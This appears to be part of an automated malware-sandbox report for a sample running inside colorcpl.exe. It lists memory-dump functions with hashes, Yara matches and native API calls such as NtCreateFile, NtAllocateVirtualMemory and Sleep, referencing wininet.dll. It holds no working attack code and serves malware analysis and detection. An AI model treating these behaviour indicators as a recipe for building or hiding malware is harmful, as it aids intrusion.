                                            • Opcode Fuzzy Hash: d9fee682c6e38763bde499e50fdd6fd6b4f227e1bf4f15c8c6a50b35e6c97bbf
                                            • Instruction Fuzzy Hash: 0190027120101403D20061695508747040597D0341F51D821A0414558DD6968891B1A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09770, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3bab09fccece77ccaca4588e47b29f8956165bc96713490cabb5005bdc622e20
                                            • Instruction ID: a9771e8ba13c254f64fc4a33f4a49f6398ce908e05151f7d14d6a5d11b408f71
                                            • Opcode Fuzzy Hash: 3bab09fccece77ccaca4588e47b29f8956165bc96713490cabb5005bdc622e20
                                            • Instruction Fuzzy Hash: EA90026120505442D20065695408A46040597D0345F51D421A1054595DC6758891F1B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A0A770, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 78ad3d5117f62963eec4683e698f0c0668aeb52faee5236d7444f1b2692a2421
                                            • Instruction ID: 5847bf32bf62a41ba9cdc3f47874bcb6937f8d28ab153e4a53c387a6bb3fdf9d
                                            • Opcode Fuzzy Hash: 78ad3d5117f62963eec4683e698f0c0668aeb52faee5236d7444f1b2692a2421
                                            • Instruction Fuzzy Hash: 6790027520505442D60065695804AC7040597D0345F51D821A041459CD869488A1F1A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09670, Relevance: .0, Instructions: 2COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: e3402ee03f312e289058b1bfefd1d935daa076871646f2a9186fa30f0aef9e36
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A5FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E00A5FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00A55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00A55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                            0x00a5fdda
                                            0x00a5fde2
                                            0x00a5fde5
                                            0x00a5fdec
                                            0x00a5fdfa
                                            0x00a5fdff
                                            0x00a5fe0a
                                            0x00a5fe0f
                                            0x00a5fe17
                                            0x00a5fe1e
                                            0x00a5fe19
                                            0x00a5fe19
                                            0x00a5fe19
                                            0x00a5fe20
                                            0x00a5fe21
                                            0x00a5fe22
                                            0x00a5fe25
                                            0x00a5fe40

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A5FDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A5FE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A5FE2B
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: 05f2b1fcdb6c4e0f3fb10e9f6ecfb3c497451875d7a5507d71965bc8a1d38da1
                                            • Instruction ID: 96e45386d4b3a81d1b37ac4873e997ea375468bc9e47f36266e5cb260fc2406d
                                            • Opcode Fuzzy Hash: 05f2b1fcdb6c4e0f3fb10e9f6ecfb3c497451875d7a5507d71965bc8a1d38da1
                                            • Instruction Fuzzy Hash: 8DF0F632600601BFDA201B55DD03F63BF6AEB84731F240314FA28565E1DA72F86096F0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: colorcpl.exe PID: 248 Parent PID: 3472 colorcpl.exeCOMMON

                                            Executed Functions

                                            Function 02B185CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02B13BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B13BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02B1861D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: fecf136d83a0db372da9681b8b88375e329951e4e994cd0b99f955a6c9a3953c
                                            • Instruction ID: 97a5b8b318bfa505158778ff30576e3710d38aabbe9978daa317dc1588efcdac
                                            • Opcode Fuzzy Hash: fecf136d83a0db372da9681b8b88375e329951e4e994cd0b99f955a6c9a3953c
                                            • Instruction Fuzzy Hash: B101B6B2210208BBCB08CF89DC94EEB77EDAF8C754F158248BA0DD7240D630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B185D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02B13BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B13BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02B1861D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction ID: 5691aef397b1ff9880fd0b3c878e327a85f025ef9208059eb23ff1eb339fc430
                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction Fuzzy Hash: 44F0BDB2200208ABCB08CF88DC94EEB77EDAF8C754F158248BA0D97240C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B1867A, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(02B13D62,5E972F65,FFFFFFFF,02B13A21,?,?,02B13D62,?,02B13A21,FFFFFFFF,5E972F65,02B13D62,?,00000000), ref: 02B186C5
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: ff9277eb3cfee77125c982f8892ed0cd62fdb07e24e09e862de341b393803762
                                            • Instruction ID: a9a90136cb95d67273b0353e0c371ed1956f689ee5d11fef14efd418a8336dbc
                                            • Opcode Fuzzy Hash: ff9277eb3cfee77125c982f8892ed0cd62fdb07e24e09e862de341b393803762
                                            • Instruction Fuzzy Hash: D6F0F9B2200108ABCB14CF88CC84EEB77A9EF8C754F118248BA4D97241CA30E855CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B18680, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(02B13D62,5E972F65,FFFFFFFF,02B13A21,?,?,02B13D62,?,02B13A21,FFFFFFFF,5E972F65,02B13D62,?,00000000), ref: 02B186C5
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction ID: 2b002213282c6ad70fa68c4876f182b7cdec98122fec942476278e3c44176f39
                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction Fuzzy Hash: 90F0A4B2200208ABCB18DF89DC94EEB77ADAF8C754F158248BE1D97241D630E851CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B187B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02B02D11,00002000,00003000,00000004), ref: 02B187E9
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction ID: d04907cb63fb43d43e633a22f01f909ab9cd4f35bc56aea978b81bf16ebdbaf5
                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction Fuzzy Hash: 16F015B2200208ABCB18DF89CC84EAB77ADAF88750F118148BE0897241C630F810CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B186FB, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(02B13D40,?,?,02B13D40,00000000,FFFFFFFF), ref: 02B18725
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 8fd6f80c12963220751c14da44c8e5d165cfd8cc80cca81c1e192e504e8f0a96
                                            • Instruction ID: bea021b15ee63c678781e9d30bb0a246c4bffd1347c4db02e12cfa7d9e01c1cb
                                            • Opcode Fuzzy Hash: 8fd6f80c12963220751c14da44c8e5d165cfd8cc80cca81c1e192e504e8f0a96
                                            • Instruction Fuzzy Hash: 71E08C722002506BD714DBA4CC88E977B68EF84360F0545A8B989AB281C530A520C790
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B18700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(02B13D40,?,?,02B13D40,00000000,FFFFFFFF), ref: 02B18725
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction ID: 91b01dfa52e62d138cc3bb79296aef23354ff1e72ceca83f924b9fd88b344c24
                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction Fuzzy Hash: 1DD012752002147BD714EB98CC49E97779DEF44750F154495BA189B241C570F55086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04579840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 321b7a4ef901d489fa27b10bc5222f5851e93314a9b9e593a1acecef7159aa1c
                                            • Instruction ID: 8fe0c63d205d712f16e06e53acb933a2618e656d9e92483093a6755622a8a873
                                            • Opcode Fuzzy Hash: 321b7a4ef901d489fa27b10bc5222f5851e93314a9b9e593a1acecef7159aa1c
                                            • Instruction Fuzzy Hash: EA900261282041527545B15984049074096B7F0285791C016E1806954C8966E85AF661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04579860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d3158a5cd41628a90d6be6930d276277235e876c45a391414ba1d7d0116c6694
                                            • Instruction ID: 0502fa736cb347d68c9c21c08b4be822fdd3096bcc402bfaaeaaa41c49b20cfb
                                            • Opcode Fuzzy Hash: d3158a5cd41628a90d6be6930d276277235e876c45a391414ba1d7d0116c6694
                                            • Instruction Fuzzy Hash: B590027124100413F11171598504B070099A7E0285F91C416E081655CD9A96D956B161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04579540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 114b4ba7513fd44bcee0c2d6cc524fe2c45cff22c03e5e4d686a24888113b454
                                            • Instruction ID: 0b28e18deb0bb70dff822b3fecf9eb998fe64502ff6e70e21b6dbfa9e178b89e
                                            • Opcode Fuzzy Hash: 114b4ba7513fd44bcee0c2d6cc524fe2c45cff22c03e5e4d686a24888113b454
                                            • Instruction Fuzzy Hash: D4900265251000032105B559470490700D6A7E5395351C025F1407554CDA61D8657161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04579910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a270f738eb92f2ee20a9d2683e46a5da2d3c0104b12719b7ab88cee652614189
                                            • Instruction ID: 4f3f967a22b7eb139d351888199612a613aa473e99cf2d6726dbecc026c6d1f1
                                            • Opcode Fuzzy Hash: a270f738eb92f2ee20a9d2683e46a5da2d3c0104b12719b7ab88cee652614189
                                            • Instruction Fuzzy Hash: D09002B124100402F14071598404B460095A7E0345F51C015E5456558E8A99DDD976A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 045795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7394e341460f8ac6bf41b44d20bc8b3869996533dc0854ae9f72eecd3b4ecc18
                                            • Instruction ID: 71245673db8a9f54539e64ac3117a3a9d6227eca717c3dc12d7df654b889b72a
                                            • Opcode Fuzzy Hash: 7394e341460f8ac6bf41b44d20bc8b3869996533dc0854ae9f72eecd3b4ecc18
                                            • Instruction Fuzzy Hash: 879002A124200003610571598414A16409AA7F0245B51C025E1406594DC965D8957165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 045799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ac338aca181e75487f317f796262df858ad8b2a2db1dceffc0c4747c3aaac023
                                            • Instruction ID: befbd813a51aa70db3d1e6376ad44633883b987e9e01e2433564504a8254815b
                                            • Opcode Fuzzy Hash: ac338aca181e75487f317f796262df858ad8b2a2db1dceffc0c4747c3aaac023
                                            • Instruction Fuzzy Hash: 679002A138100442F10071598414F060095E7F1345F51C019E1456558D8A59DC567166
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04579A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e1e7d8ea8bd22a3e1aa7b691fada597ea10918b9e3f5153e64ef850f781136bc
                                            • Instruction ID: 90b8f693a453809ceae458848d20a9770716d4baa4dd8d2064bfd88be04aca58
                                            • Opcode Fuzzy Hash: e1e7d8ea8bd22a3e1aa7b691fada597ea10918b9e3f5153e64ef850f781136bc
                                            • Instruction Fuzzy Hash: 3C90026125180042F20075698C14F070095A7E0347F51C119E0546558CCD55D8657561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04579650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a4f54d58177c5bdb07d567cb7879947e5151ec3095cc11275c91d899b66c4db8
                                            • Instruction ID: 741657ccb53352d9d9cde623e4b615029999d37db42f9ca5d9f71e333640c1eb
                                            • Opcode Fuzzy Hash: a4f54d58177c5bdb07d567cb7879947e5151ec3095cc11275c91d899b66c4db8
                                            • Instruction Fuzzy Hash: 9190027124504842F14071598404E4600A5A7E0349F51C015E0456698D9A65DD59B6A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04579660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ce8ce85decd05de7401670020dd76ba42eb390146181712afcdfc64891a7b85d
                                            • Instruction ID: ca7dcae74ca6f9da657c4e01830877c0bb582b1f7906fcd796db7d54bd4f8aa2
                                            • Opcode Fuzzy Hash: ce8ce85decd05de7401670020dd76ba42eb390146181712afcdfc64891a7b85d
                                            • Instruction Fuzzy Hash: 0390027124100802F18071598404A4A0095A7E1345F91C019E0417658DCE55DA5D77E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 045796D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0902c9c54727599e26eafa9ddb8382df8688e24daaa0eb103e3b66087b5b3d2c
                                            • Instruction ID: 0486b7e432e9f52094e8b901187c167b5be30d654d923bcf67e288a2a5de1ba6
                                            • Opcode Fuzzy Hash: 0902c9c54727599e26eafa9ddb8382df8688e24daaa0eb103e3b66087b5b3d2c
                                            • Instruction Fuzzy Hash: 7C90027124100842F10071598404F460095A7F0345F51C01AE0516658D8A55D8557561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 045796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0a517018dba515cdde2d00910e89ea0129c3d84064ffe972061f021ddde9d12c
                                            • Instruction ID: e3f6416bd8ce2c677d3db30a1f848c226327f60d668b89a735fe12eda7a4e8a5
                                            • Opcode Fuzzy Hash: 0a517018dba515cdde2d00910e89ea0129c3d84064ffe972061f021ddde9d12c
                                            • Instruction Fuzzy Hash: 8190027124108802F1107159C404B4A0095A7E0345F55C415E481665CD8AD5D8957161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04579710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a12aea1f3a26b369c5f27198901f3621778f9c73820b51b93be0440de1163a35
                                            • Instruction ID: 94fe1059627120d22b5fd44a25b1b8283cf28d1aef6bcee8d79ad258543fc2ff
                                            • Opcode Fuzzy Hash: a12aea1f3a26b369c5f27198901f3621778f9c73820b51b93be0440de1163a35
                                            • Instruction Fuzzy Hash: DF90027124100402F10075999408A460095A7F0345F51D015E5416559ECAA5D8957171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04579FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f322350b2eb33b484be8369c0a908ccd688c075ba55ba0c48cff92cf78e1a0a2
                                            • Instruction ID: 35de21a93ef1e224de848aa30e84ed7a55b5c28f66058fa15b35b83f8df12064
                                            • Opcode Fuzzy Hash: f322350b2eb33b484be8369c0a908ccd688c075ba55ba0c48cff92cf78e1a0a2
                                            • Instruction Fuzzy Hash: 5F90027135114402F1107159C404B060095A7E1245F51C415E0C1655CD8AD5D8957162
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04579780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 785a1d44a999ee1107623ec70e2a85fce0255cf17891740c579a30986feac6d0
                                            • Instruction ID: 33ee1306912bf3d1bdad5a65f02dd59f5f73671d34b949a95ae16e0eb9e9cfd7
                                            • Opcode Fuzzy Hash: 785a1d44a999ee1107623ec70e2a85fce0255cf17891740c579a30986feac6d0
                                            • Instruction Fuzzy Hash: A590026925300002F18071599408A0A0095A7E1246F91D419E040755CCCD55D86D7361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B188D4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(02B13526,?,02B13C9F,02B13C9F,?,02B13526,?,?,?,?,?,00000000,00000000,?), ref: 02B188CD
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B03B93), ref: 02B1890D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFree
                                            • String ID: .z`
                                            • API String ID: 2488874121-1441809116
                                            • Opcode ID: d8ee551d431861ff0c132791f448707b9cedd9e80127dc6f6d9ecdb5944b4012
                                            • Instruction ID: 7e4a6b2620e1b42e8a878d03c1d3436e6ccb88ba7616f07d565c5f85fdf734c8
                                            • Opcode Fuzzy Hash: d8ee551d431861ff0c132791f448707b9cedd9e80127dc6f6d9ecdb5944b4012
                                            • Instruction Fuzzy Hash: E1F082B52002046BD714DF95DC48EE7775DEF88750F114555FD0857241C631E8508AF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B172F0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 02B17398
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: dbdfa47433bd3c693f2554cc057ea5b0e37f8f80de9db38fc3c7998424d57d2a
                                            • Instruction ID: a38fdb76f10a7011e080d486724577b7e93b9d6de58e7beb8c4d92b391ae5195
